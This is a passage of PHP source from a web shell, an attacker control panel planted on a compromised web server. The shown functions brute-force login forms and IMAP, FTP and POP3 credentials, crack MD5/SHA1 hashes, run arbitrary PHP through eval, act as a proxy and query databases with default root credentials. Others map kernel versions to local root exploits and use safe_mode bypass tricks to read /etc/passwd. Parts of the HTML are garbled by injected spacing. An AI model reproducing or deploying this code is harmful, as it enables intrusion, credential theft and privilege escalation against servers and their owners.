                                            if (is_writeable($ln)) echo "W";
                                            if (is_executable($ln)) echo "X";
                                            echo "</a></td>";
                                            echo "$cl1$size</td>";
                                            echo $cl2 . $linkaction;
                                            echo '</tr>';
                                            }}$dc = count($dir) - 2;
                                            if ($dc == - 2) $dc = 0;
                                            $fc = count($file);
                                            $lc = count($link);
                                            $total = $dc + $fc + $lc;
                                            $min = min(substr(ini_get('upload_max_filesize'), 0, strpos(ini_get('post_max_size'), 'M')), substr(ini_get('post_max_size'), 0, strpos(ini_get('post_max_size'), 'M'))) . ' MB';
                                            echo "</table></div>$table<tr><td><form method=POST>Find:<input type=text value=\$pass name=search><input type=checkbox name=re value=1 style='border-width:1px;background-color:#333333;'>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value='fm' name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width='100%'><tr><td width='50%'><br><table bgcolor=#333333 border=0 width='65%'><td><b>Summery:</b> Total: $total Directories: $dc Files: $fc Links: $lc$et<table bgcolor=#333333 border=0 width='65%'><td width='100%' bgcolor=";
                                            if (is_writeable($cwd)) echo '#006E00';
                                            elseif (!is_readable($cwd)) echo '#800000';
                                            else '#333333';
                                            echo '>Current directory status: ';
                                            if (is_readable($cwd)) echo 'R';
                                            if (is_writeable($cwd)) echo 'W';
                                            echo "$et<table border=0 style='border-collapse: collapse' width='65%'><tr><td width='100%' bgcolor='#333333'>New:</td></tr><tr>$td1n<form method='POST'><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value='File'><input class=buttons type=submit name=newdir value='Folder'></form>$et</td><td width='50%'><br>${t
                                        }
                                        Upload:</td></tr><tr>$td1n<form method='POST' enctype='multipart/form-data'><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is $min</form>$et$et";
                                        }
}
function imapchecK($host,$username,$password,$timeout){
$sock=fsockopen($host,143,$n,$s,$timeout);
$b=uniqid('NJ');
$l=strlen($b);
if(!$sock)return -1;
fread($sock,1024);
fputs($sock,"$bLOGIN $username$password");
$res=fgets($sock,$l+4);
fclose($sock);
if($res=="$bOK")return 1;else return 0;
}
function ftpchecK($host,$username,$password,$timeout){
$ftp=ftp_connect($host,21,$timeout);
if(!$ftp)return -1;
$con=ftp_login($ftp,$username,$password);
if($con)return 1;else return 0;
}
function pop3checK($server,$user,$pass,$timeout){
$sock=fsockopen($server,110,$en,$es,$timeout);
if(!$sock)return -1;
fread($sock,1024);
fwrite($sock,"user $user");
$r=fgets($sock);
if($r{0}=='-')return 0;
fwrite($sock,"pass $pass");
$r=fgets($sock);
fclose($sock);
if($r{0}=='+')return 1;
return 0;
}
function formcrackeR(){
global $errorbox,$footer,$et,$hcwd;
if(!empty($_REQUEST['start'])){
if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log = 1;
                                        $file = $_REQUEST['logfilE'];
                                        }else $log=0;
$url=$_REQUEST['target'];
$uf=$_REQUEST['userf'];
$pf=$_REQUEST['passf'];
$sf=$_REQUEST['submitf'];
$sv=$_REQUEST['submitv'];
$method=$_REQUEST['method'];
$fail=$_REQUEST['fail'];
$dic=$_REQUEST['dictionary'];
$type=$_REQUEST['combo'];
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';
if(!file_exists($dic))die("$errorboxCannotopendictionary . $et$footer");
$dictionary=fopen($dic,'r');
echo '<font color=blue>Cracking started...<br>';
while(!feof($dictionary)){
if($type){
$combo=trim(fgets($dictionary),"");
$user=substr($combo,0,strpos($combo,':'));
$pass=substr($combo,strpos($combo,':')+1);
}else{
$pass=trim(fgets($dictionary),"");
}
$url.=" ? $uf = $user & $pf = $pass & $sf = $sv";
$res=check_urL($url,$method,$fail,12);
if(!$res){echo " < fontcolor = blue > U : $userP:
                                            $pass < / font > < br > ";if($log)file_add_contentS($file,"U:
                                                $userP:
                                                    $pass");if(!$type)break;}
}
fclose($dictionary);
echo 'Done!</font><br>';
}
else echo " < center > < tableborder = 0style = 'border-collapse: collapse'width = '434' > < tr > < tdwidth = '174'bgcolor = '#333333' > HTTPFormcracker: < / td > < tdbgcolor = '#333333'width = '253' > < / td > < / tr > < formmethod = 'POST'name = form > < tr > < tdwidth = '174'bgcolor = '#666666' > Dictionary: < / td > < tdbgcolor = '#666666'width = '253' > < inputtype = textname = dictionarysize = 35 > < / td > < / tr > < tr > < tdwidth = '174'bgcolor = '#808080' > Dictionarytype: < / td > < tdbgcolor = '#808080' > < inputtype = radioname = combocheckedvalue = 0onClick = 'document.form.user.disabled = false;'style = 'border-width:1px;background-color:#808080;' > Simple(P) < inputtype = radiovalue = 1name = comboonClick = 'document.form.user.disabled = true;'style = 'border-width:1px;background-color:#808080;' > Combo(U:
                                                                    P) < / td > < / tr > < tr > < tdwidth = '174'bgcolor = '#666666' > Username: < / td > < tdbgcolor = '#666666' > < inputtype = textsize = 35value = rootname = user > $hcwd < / td > < / tr > < tr > < tdwidth = '174'bgcolor = '#808080' > ActionPage: < / td > < tdbgcolor = '#808080'width = '253' > < inputtype = textname = targetvalue = 'http://".getenv('HTTP_HOST')."/login.php'size = 35 > < / td > < / tr > < tr > < tdwidth = '174'bgcolor = '#666666' > Method: < / td > < tdbgcolor = '#666666'width = '253' > < selectsize = '1'name = 'method' > < optionselectedvalue = 'POST' > POST < / option > < optionvalue = 'GET' > GET < / option > < / select > < / td > < / tr > < tr > < tdwidth = '174'bgcolor = '#808080' > Usernamefieldname: < / td > < tdbgcolor = '#808080'width = '253' > < inputtype = textname = userfvalue = usersize = 35 > < / td > < / tr > < tr > < tdwidth = '174'bgcolor = '#666666' > Passwordfieldname: < / td > < tdbgcolor = '#666666'width = '253' > < inputtype = textname = passfvalue = passwdsize = 35 > < / td > < / tr > < tr > < tdwidth = '174'bgcolor = '#808080' > Submitname: < / td > < tdbgcolor = '#808080'width = '253' > < inputtype = textvalue = loginname = submitfsize = 35 > < / td > < / tr > < tr > < tdwidth = '174'bgcolor = '#666666' > Submitvalue: < / td > < tdbgcolor = '#666666'width = '253' > < inputtype = textvalue = 'Login'name = submitvsize = 35 > < / td > < / tr > < tr > < tdwidth = '174'bgcolor = '#808080' > Failstring: < / td > < tdbgcolor = '#808080'width = '253' > < inputtype = textname = failvalue = 'Try again'size = 35 > < / td > < / tr > < tr > < tdwidth = '174'bgcolor = '#666666' > < inputtype = checkboxname = loGvalue = 1onClick = 'document.form.logfilE.disabled = !document.form.logfilE.disabled;'style = 'border-width:1px;background-color:#666666;'checked > Log < / td > < tdbgcolor = '#666666' > < inputtype = textname = logfilEsize = 25value = '".whereistmP().DIRECTORY_SEPARATOR.".log' > < inputclass = buttonstype = submitname = startvalue = Start > < / form > $et < / center > ";
}
function hashcrackeR(){
global $errorbox,$t,$et,$hcwd;
if(!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log = 1;
                                                                                                    $file = $_REQUEST['logfilE'];
                                                                                                    }else $log=0;
$dictionary=fopen($_REQUEST['dictionary'],'r');
if($dictionary){
$hash=strtoupper($_REQUEST['hash']);
echo '<font color=blue>Cracking '.htmlspecialchars($hash).'...<br>';
$type=($_REQUEST['type']=='MD5')?'md5':'sha1';
while(!feof($dictionary)){
$word=trim(fgets($dictionary),"");
if($hash==strtoupper(($type($word)))){echo "Theansweris $word < br > ";if($log)file_add_contentS($file,"$x");break;}
}
echo 'Done!</font>';
fclose($dictionary);
}
else{
echo "$errorboxCannotopendictionary . $et";
}
}
echo " < center > $ {
                                                                                                        t
                                                                                                    }
                                                                                                    Hashcracker: < / td > < tdbgcolor = '#333333' > < / td > < / tr > < formmethod = 'POST' > < tr > < tdwidth = '20%'bgcolor = '#666666' > Dictionary: < / td > < tdbgcolor = '#666666' > < inputtype = textname = dictionarysize = 35 > < / td > < / tr > < tr > < tdwidth = '20%'bgcolor = '#808080' > Hash: < / td > < tdbgcolor = '#808080' > < inputtype = textname = hashsize = 35 > < / td > < / tr > < tr > < tdwidth = '20%'bgcolor = '#666666' > Type: < / td > < tdbgcolor = '#666666' > < selectname = type > < optionselectedvalue = MD5 > MD5 < / option > < optionvalue = SHA1 > SHA1 < / option > < / select > < / td > < / tr > < tr > < tdwidth = '20%'bgcolor = '#808080' > < inputtype = checkboxname = loGvalue = 1onClick = 'document.form.logfilE.disabled = !document.form.logfilE.disabled;'style = 'border-width:1px;background-color:#808080;'checked > Log < / td > < tdbgcolor = '#808080' > < inputtype = textname = logfilEsize = 25value = '".whereistmP().DIRECTORY_SEPARATOR.".log' > $hcwd < inputclass = buttonstype = submitvalue = Start > < / form > $et < / center > ";
}
function pr0xy(){
global $errorbox,$et,$footer,$hcwd;
echo " < tableborder = 0cellpadding = 0cellspacing = 0style = 'border-collapse: collapse'bgcolor = '#333333'width = '100%' > < formmethod = 'POST' > < tr > < tdwidth = '20%' > < b > Navigator: < / b > < inputtype = textname = urLsize = 140value = '";if(!!empty($_REQUEST['urL'])) echo 'http: //www.edpsciences.org/htbin/ipaddress'; else echo htmlspecialchars($_REQUEST['urL']);echo "'>$hcwd<input type=submit class=buttons value=Go></form>$et";
                                                                                                                            if (!empty($_REQUEST['urL'])) {
                                                                                                                                $u = parse_url($_REQUEST['urL']);
                                                                                                                                $host = $u['host'];
                                                                                                                                $file = (!empty($u['path'])) ? $u['path'] : '/';
                                                                                                                                $dir = dirname($file);
                                                                                                                                $con = getiT($_REQUEST['urL']);
                                                                                                                                $s = array("href=mailto" => "HrEf=mailto", "HREF=mailto" => "HrEf=mailto", "href='mailto" => "HrEf=\"mailto", "HREF=\"mailto" => "HrEf=\"mailto", "href=\'mailto" => "HrEf=\"mailto", "HREF=\'mailto" => "HrEf=\"mailto", "href=\"http" => "HrEf=\"" . hlinK("seC=px&urL=http"), "href=\'http" => "HrEf=\"" . hlinK("seC=px&urL=http"), "HREF=\'http" => "HrEf=\"" . hlinK("seC=px&urL=http"), "href=http" => "HrEf=" . hlinK("seC=px&urL=http"), "HREF=http" => "HrEf=" . hlinK("seC=px&urL=http"), "href=\"" => "HrEf=\"" . hlinK("seC=px&urL=http://$host/$dir/"), "HREF=\"" => "HrEf=\"" . hlinK("seC=px&urL=http://$host/$dir/"), "href=\"" => "HrEf=\'" . hlinK("seC=px&urL=http://$host/$dir/"), 'HREF="' => 'HrEf="' . hlinK("seC=px&urL=http://$host/$dir/"), "href=" => "HrEf=" . hlinK("seC=px&urL=http://$host/$dir/"), "HREF=" => "HrEf=" . hlinK("seC=px&urL=http://$host/$dir/"));
                                                                                                                                $con = replace_stR($s, $con);
                                                                                                                                echo $con;
                                                                                                                            }
                                                                                                                        }
                                                                                                                        function sqlclienT() {
                                                                                                                            global $t, $errorbox, $et, $hcwd;
                                                                                                                            if (!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])) {
                                                                                                                                $server = $_REQUEST['serveR'];
                                                                                                                                $type = $_REQUEST['typE'];
                                                                                                                                $pass = $_REQUEST['pasS'];
                                                                                                                                $user = $_REQUEST['useR'];
                                                                                                                                $query = $_REQUEST['querY'];
                                                                                                                                $db = (empty($_REQUEST['dB'])) ? '' : $_REQUEST['dB'];
                                                                                                                                $res = querY($type, $server, $user, $pass, $db, $query);
                                                                                                                                if ($res) {
                                                                                                                                    $res = str_replace('|-|-|-|-|-|', '</td><td>', $res);
                                                                                                                                    $res = str_replace('|+|+|+|+|+|', '</td></tr><tr><td>', $res);
                                                                                                                                    $r = explode('[+][+][+]', $res);
                                                                                                                                    $r[1] = str_replace('[-][-][-]', "</td><td bgcolor='333333'>", $r[1]);
                                                                                                                                    echo "<table border=0 bgcolor='666666' width='100%'></tr><tr><td bgcolor='333333'>" . $r[1] . '</tr><tr><td>' . $r[0] . "$et<br>";
                                                                                                                                } else {
                                                                                                                                    echo "$errorbox Failed!$et<br>";
                                                                                                                                }
                                                                                                                            }
                                                                                                                            if (empty($_REQUEST['typE'])) $_REQUEST['typE'] = '';
                                                                                                                            echo "<center>${t}SQL cilent:</td><form name=client method='POST'><td bgcolor='#333333'><select name=typE><option valut=MySQL onClick='document.client.serveR.disabled = false;' ";
                                                                                                                            if ($_REQUEST['typE'] == 'MySQL') echo 'selected';
                                                                                                                            echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";
                                                                                                                            if ($_REQUEST['typE'] == 'MSSQL') echo 'selected';
                                                                                                                            echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";
                                                                                                                            if ($_REQUEST['typE'] == 'Oracle') echo 'selected';
                                                                                                                            echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";
                                                                                                                            if ($_REQUEST['typE'] == 'PostgreSQL') echo 'selected';
                                                                                                                            echo ">PostgreSQL</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";
                                                                                                                            if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);
                                                                                                                            else echo 'localhost';
                                                                                                                            echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";
                                                                                                                            if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);
                                                                                                                            else echo 'root';
                                                                                                                            echo "' size=35></td><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text value='";
                                                                                                                            if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);
                                                                                                                            else echo '123456';
                                                                                                                            echo "' name=pasS size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text value='";
                                                                                                                            if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);
                                                                                                                            echo "' name=dB size=35></td><tr><td width='20%' bgcolor='#666666'>Query:</td><td bgcolor='#666666'><textarea name=querY rows=5 cols=27>";
                                                                                                                            if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));
                                                                                                                            else echo 'SHOW DATABASES';
                                                                                                                            echo "</textarea></td></tr></tr><tr><td width='20%' bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value='Submit Query'></form>$et</center>";
                                                                                                                        }
                                                                                                                        function querY($type, $host, $user, $pass, $db = '', $query) {
                                                                                                                            $res = '';
                                                                                                                            switch ($type) {
                                                                                                                                case 'MySQL':
                                                                                                                                    if (!function_exists('mysql_connect')) return 0;
                                                                                                                                    $link = mysql_connect($host, $user, $pass);
                                                                                                                                    if ($link) {
                                                                                                                                        if (!empty($db)) mysql_select_db($db, $link);
                                                                                                                                        $result = mysql_query($query, $link);
                                                                                                                                        while ($data = mysql_fetch_row($result)) $res.= implode('|-|-|-|-|-|', $data) . '|+|+|+|+|+|';
                                                                                                                                        $res.= '[+][+][+]';
                                                                                                                                        for ($i = 0;$i < mysql_num_fields($result);$i++) $res.= mysql_field_name($result, $i) . '[-][-][-]';
                                                                                                                                        mysql_close($link);
                                                                                                                                        return $res;
                                                                                                                                    }
                                                                                                                                    break;
                                                                                                                                case 'MSSQL':
                                                                                                                                    if (!function_exists('mssql_connect')) return 0;
                                                                                                                                    $link = mssql_connect($host, $user, $pass);
                                                                                                                                    if ($link) {
                                                                                                                                        if (!empty($db)) mssql_select_db($db, $link);
                                                                                                                                        $result = mssql_query($query, $link);
                                                                                                                                        while ($data = mssql_fetch_row($result)) $res.= implode('|-|-|-|-|-|', $data) . '|+|+|+|+|+|';
                                                                                                                                        $res.= '[+][+][+]';
                                                                                                                                        for ($i = 0;$i < mssql_num_fields($result);$i++) $res.= mssql_field_name($result, $i) . '[-][-][-]';
                                                                                                                                        mssql_close($link);
                                                                                                                                        return $res;
                                                                                                                                    }
                                                                                                                                    break;
                                                                                                                                case 'Oracle':
                                                                                                                                    if (!function_exists('ocilogon')) return 0;
                                                                                                                                    $link = ocilogon($user, $pass, $db);
                                                                                                                                    if ($link) {
                                                                                                                                        $stm = ociparse($link, $query);
                                                                                                                                        ociexecute($stm, OCI_DEFAULT);
                                                                                                                                        while ($data = ocifetchinto($stm, $data, OCI_ASSOC + OCI_RETURN_NULLS)) $res.= implode('|-|-|-|-|-|', $data) . '|+|+|+|+|+|';
                                                                                                                                        $res.= '[+][+][+]';
                                                                                                                                        for ($i = 0;$i < oci_num_fields($stm);$i++) $res.= oci_field_name($stm, $i) . '[-][-][-]';
                                                                                                                                        return $res;
                                                                                                                                    }
                                                                                                                                    break;
                                                                                                                                case 'PostgreSQL':
                                                                                                                                    if (!function_exists('pg_connect')) return 0;
                                                                                                                                    $link = pg_connect("host=$host dbname=$db user=$user password=$pass");
                                                                                                                                    if ($link) {
                                                                                                                                        $result = pg_query($link, $query);
                                                                                                                                        while ($data = pg_fetch_row($result)) $res.= implode('|-|-|-|-|-|', $data) . '|+|+|+|+|+|';
                                                                                                                                        $res.= '[+][+][+]';
                                                                                                                                        for ($i = 0;$i < pg_num_fields($result);$i++) $res.= pg_field_name($result, $i) . '[-][-][-]';
                                                                                                                                        pg_close($link);
                                                                                                                                        return $res;
                                                                                                                                    }
                                                                                                                                    break;
                                                                                                                                }
                                                                                                                                return 0;
                                                                                                                            }
                                                                                                                            function phpevaL() {
                                                                                                                                global $t, $hcwd, $et;
                                                                                                                                echo '<center>';
                                                                                                                                if (!empty($_REQUEST['code'])) {
                                                                                                                                    $s = array('<?php' => '', '<?' => '', '?>' => '');
                                                                                                                                    echo "<textarea rows='10' cols='64'>";
                                                                                                                                    echo htmlspecialchars(eval(replace_stR($s, $_REQUEST['code'])));
                                                                                                                                    echo '</textarea><br><br>';
                                                                                                                                }
                                                                                                                                echo "${t}Evaler:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Codes:</td><td bgcolor='#666666'><textarea rows='10' name='code' cols='64'>";
                                                                                                                                if (!empty($_REQUEST['code'])) echo htmlspecialchars($_REQUEST['code']);
                                                                                                                                echo "</textarea></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value=Execute></form>$et</center>";
                                                                                                                            }
                                                                                                                            function rootxpL() {
                                                                                                                                $v = php_uname();
                                                                                                                                $db = array('2.6.17' => 'prctl3, raptor_prctl, py2', '2.6.16' => 'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit', '2.6.15' => 'py2, exp.sh, raptor, raptor2, h00lyshit', '2.6.14' => 'raptor, raptor2, h00lyshit', '2.6.13' => 'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit', '2.6.12' => 'h00lyshit', '2.6.11' => 'krad3, krad, h00lyshit', '2.6.10' => 'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2', '2.6.9' => 'exp.sh, krad3, py2, prctl3, h00lyshit', '2.6.8' => 'h00lyshit, krad, krad2', '2.6.7' => 'h00lyshit, krad, krad2', '2.6.6' => 'h00lyshit, krad, krad2', '2.6.2' => 'h00lyshit, krad, mremap_pte', '2.6.' => 'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak', '2.4.29' => 'elflbl, expand_stack, stackgrow2, uselib24, smpracer', '2.4.27' => 'elfdump, uselib24', '2.4.25' => 'uselib24', '2.4.24' => 'mremap_pte, loko, uselib24', '2.4.23' => 'mremap_pte, loko, uselib24', '2.4.22' => 'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod', '2.4.21' => 'w00t, brk, uselib24, loginx, brk2, ptrace-kmod', '2.4.20' => 'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod', '2.4.19' => 'newlocal, w00t, ave, uselib24, loginx, kmod', '2.4.18' => 'km2, w00t, uselib24, loginx, kmod', '2.4.17' => 'newlocal, w00t, uselib24, loginx, kmod', '2.4.16' => 'w00t, uselib24, loginx', '2.4.10' => 'w00t, brk, uselib24, loginx', '2.4.9' => 'ptrace24, uselib24', '2.4.' => 'kmdx, remap, pwned, ptrace_kmod, ong_bak', '2.2.25' => 'mremap_pte', '2.2.24' => 'ptrace', '2.2.' => 'rip, ptrace');
                                                                                                                                foreach ($db as $k => $x) if (strstr($v, $k)) return $x;
                                                                                                                                return 0;
                                                                                                                            }
                                                                                                                            function toolS() {
                                                                                                                                global $t, $hcwd, $et, $cwd;
                                                                                                                                if (!empty($_REQUEST['serveR']) && !empty($_REQUEST['domaiN'])) {
                                                                                                                                    $ser = fsockopen($_REQUEST['serveR'], 43, $en, $es, 5);
                                                                                                                                    fputs($ser, $_REQUEST['domaiN'] . "
");
                                                                                                                                    echo '<pre>';
                                                                                                                                    while (!feof($ser)) echo fgets($ser, 1024);
                                                                                                                                    echo '</pre>';
                                                                                                                                    fclose($ser);
                                                                                                                                } elseif (!empty($_REQUEST['urL'])) {
                                                                                                                                    $h = '';
                                                                                                                                    $u = parse_url($_REQUEST['urL']);
                                                                                                                                    $host = $u['host'];
                                                                                                                                    $file = (!empty($u['path'])) ? $u['path'] : '/';
                                                                                                                                    $port = (empty($u['port'])) ? 80 : $u['port'];
                                                                                                                                    $ser = fsockopen($host, $port, $en, $es, 5);
                                                                                                                                    if ($ser) {
                                                                                                                                        fputs($ser, "GET $file
Host: $host

");
                                                                                                                                        echo '<pre>';
                                                                                                                                        while ($h != "
") {
                                                                                                                                            $h = fgets($ser, 1024);
                                                                                                                                            echo $h;
                                                                                                                                        }
                                                                                                                                        echo '</pre>';
                                                                                                                                        fclose($ser);
                                                                                                                                    }
                                                                                                                                } elseif (!empty($_REQUEST['ouT']) && isset($_REQUEST['pW']) && !empty($_REQUEST['uN'])) {
                                                                                                                                    $htpasswd = $_REQUEST['ouT'] . DIRECTORY_SEPARATOR . '.htpasswd';
                                                                                                                                    $htaccess = $_REQUEST['ouT'] . DIRECTORY_SEPARATOR . '.htaccess';
                                                                                                                                    file_put_contents($htpasswd, $_REQUEST['uN'] . ':' . crypt(trim($_REQUEST['pW']), CRYPT_STD_DES));
                                                                                                                                    file_put_contents($htaccess, "AuthName \"Secure\"
AuthType Basic
AuthUserFile $htpasswd
Require valid-user
");
                                                                                                                                    echo '<font color=blue>Done</font>';
                                                                                                                                }
                                                                                                                                $s = "</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>";
                                                                                                                                echo "<center>${t}WhoIs:${s}Server:</td><td bgcolor='#666666'><input type=text value='";
                                                                                                                                if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);
                                                                                                                                else echo 'whois.geektools.com';
                                                                                                                                echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>domain:</td><td bgcolor='#808080'><input type=text name=domaiN value='";
                                                                                                                                if (!empty($_REQUEST['domaiN'])) echo htmlspecialchars($_REQUEST['domaiN']);
                                                                                                                                else echo 'google.com';
                                                                                                                                echo "' size=35></td><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value='Do'></form>$et<br>${t}.ht* generator:${s}Username:</td><td bgcolor='#666666'><input type=text value='";
                                                                                                                                if (!empty($_REQUEST['uN'])) echo htmlspecialchars($_REQUEST['uN']);
                                                                                                                                else echo 'r00t';
                                                                                                                                echo "' name=uN size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Password:</td><td bgcolor='#808080'><input type=text name=pW value='";
                                                                                                                                if (!empty($_REQUEST['pW'])) echo htmlspecialchars($_REQUEST['pW']);
                                                                                                                                else echo uniqid('@');
                                                                                                                                echo "' size=35></td><tr><td width='20%' bgcolor='#666666'>Directory:</td><td bgcolor='#666666'><input type=text name=ouT value='";
                                                                                                                                if (!empty($_REQUEST['ouT'])) echo htmlspecialchars($_REQUEST['ouT']);
                                                                                                                                else echo $cwd;
                                                                                                                                echo "' size=35></td><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Make></form>$et<br>${t}Grab header:${s}URL:</td><td bgcolor='#666666'><input type=text value='";
                                                                                                                                if (!empty($_REQUEST['urL'])) echo htmlspecialchars($_REQUEST['urL']);
                                                                                                                                else echo 'http://kkt.at.ua/';
                                                                                                                                echo "' name=urL size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value='Get'></form>$et<br></center>";
                                                                                                                            }
                                                                                                                            function hexvieW() {
                                                                                                                                if (!empty($_REQUEST['filE'])) {
                                                                                                                                    $f = $_REQUEST['filE'];
                                                                                                                                    echo "<table border=0 style='border-collapse: collapse' width='100%'><td width='10%' bgcolor='#282828'>Offset</td><td width='25%' bgcolor='#282828'>Hex</td><td width='25%' bgcolor='#282828'></td><td width='40%' bgcolor='#282828'>ASCII</td></tr>";
                                                                                                                                    $file = fopen($f, 'r');
                                                                                                                                    $i = - 1;
                                                                                                                                    while (!feof($file)) {
                                                                                                                                        $ln = '';
                                                                                                                                        $i++;
                                                                                                                                        echo "<tr><td width='10%' bgcolor='#";
                                                                                                                                        if ($i % 2 == 0) echo '666666';
                                                                                                                                        else echo '808080';
                                                                                                                                        echo "'>";
                                                                                                                                        echo str_repeat('0', (8 - strlen($i * 16))) . $i * 16;
                                                                                                                                        echo '</td>';
                                                                                                                                        echo "<td width='25%' bgcolor='#";
                                                                                                                                        if ($i % 2 == 0) echo '666666';
                                                                                                                                        else echo '808080';
                                                                                                                                        echo "'>";
                                                                                                                                        for ($j = 0;$j <= 7;$j++) {
                                                                                                                                            if (!feof($file)) {
                                                                                                                                                $tmp = strtoupper(dechex(ord(fgetc($file))));
                                                                                                                                                if (strlen($tmp) == 1) $tmp = '0' . $tmp;
                                                                                                                                                echo $tmp . ' ';
                                                                                                                                                $ln.= $tmp;
                                                                                                                                            }
                                                                                                                                        }
                                                                                                                                        echo "</td><td width='25%' bgcolor='#";
                                                                                                                                        if ($i % 2 == 0) echo '666666';
                                                                                                                                        else echo '808080';
                                                                                                                                        echo "'>";
                                                                                                                                        for ($j = 7;$j <= 14;$j++) {
                                                                                                                                            if (!feof($file)) {
                                                                                                                                                $tmp = strtoupper(dechex(ord(fgetc($file))));
                                                                                                                                                if (strlen($tmp) == 1) $tmp = '0' . $tmp;
                                                                                                                                                echo $tmp . ' ';
                                                                                                                                                $ln.= $tmp;
                                                                                                                                            }
                                                                                                                                        }
                                                                                                                                        echo "</td><td width='40%' bgcolor='#";
                                                                                                                                        if ($i % 2 == 0) echo '666666';
                                                                                                                                        else echo '808080';
                                                                                                                                        echo "'>";
                                                                                                                                        $n = 0;
                                                                                                                                        $asc = '';
                                                                                                                                        $co = 0;
                                                                                                                                        for ($k = 0;$k <= 16;$k++) {
                                                                                                                                            $co = hexdec(substr($ln, $n, 2));
                                                                                                                                            if (($co <= 31) || (($co >= 127) && ($co <= 160))) $co = 46;
                                                                                                                                            $asc.= chr($co);
                                                                                                                                            $n+= 2;
                                                                                                                                        }
                                                                                                                                        echo htmlspecialchars($asc);
                                                                                                                                        echo '</td></tr>';
                                                                                                                                    }
                                                                                                                                }
                                                                                                                                fclose($file);
                                                                                                                                echo '</table>';
                                                                                                                            }
                                                                                                                            function safemodE() {
                                                                                                                                global $windows, $t, $hcwd, $et;
                                                                                                                                $file = (empty($_REQUEST['file'])) ? '/etc/passwd' : $_REQUEST['file'];
                                                                                                                                $pr = "
</font><font color=green>Method ";
                                                                                                                                $po = ")</font><font color=blue>
";
                                                                                                                                $i = 1;
                                                                                                                                if (!empty($_REQUEST['read'])) {
                                                                                                                                    echo "<pre>$pr$i:(ini_restore$po";
                                                                                                                                    ini_restore('safe_mode');
                                                                                                                                    ini_restore('open_basedir');
                                                                                                                                    readfile($file);
                                                                                                                                    $i++;
                                                                                                                                    echo "$pr$i:(include$po";
                                                                                                                                    include ($file);
                                                                                                                                    $i++;
                                                                                                                                    echo "$pr$i:(copy$po";
                                                                                                                                    $tmp = tempnam('', 'cx');
                                                                                                                                    copy('compress.zlib://' . $file, $tmp);
                                                                                                                                    $fh = fopen($tmp, 'r');
                                                                                                                                    $data = fread($fh, filesize($tmp));
                                                                                                                                    fclose($fh);
                                                                                                                                    echo $data;
                                                                                                                                    $i++;
                                                                                                                                    if (function_exists('mb_send_mail')) {
                                                                                                                                        echo "$pr$i:(mb_send_mail$po";
                                                                                                                                        if (file_exists('/tmp/mb_send_mail')) unlink('/tmp/mb_send_mail');
                                                                                                                                        mb_send_mail(NULL, NULL, NULL, NULL, '-C $file -X /tmp/mb_send_mail');
                                                                                                                                        readfile('/tmp/mb_send_mail');
                                                                                                                                        $i++;
                                                                                                                                    }
                                                                                                                                    if (function_exists('curl_init')) {
                                                                                                                                        echo "$pr$i:(curl_init [A]$po";
                                                                                                                                        $fh = curl_init('file://' . $file . '');
                                                                                                                                        $tmp = curl_exec($fh);
                                                                                                                                        echo $tmp;
                                                                                                                                        $i++;
                                                                                                                                        echo "$pr$i:(curl_init [B]$po";
                                                                                                                                        $i++;
                                                                                                                                        if (strstr($file, DIRECTORY_SEPARATOR)) $ch = curl_init('file:///' . $file . "/../../../../../../../../../../../../" . __FILE__);
                                                                                                                                        else $ch = curl_init('file://' . $file . "" . __FILE__);
                                                                                                                                        var_dump(curl_exec($ch));
                                                                                                                                    }
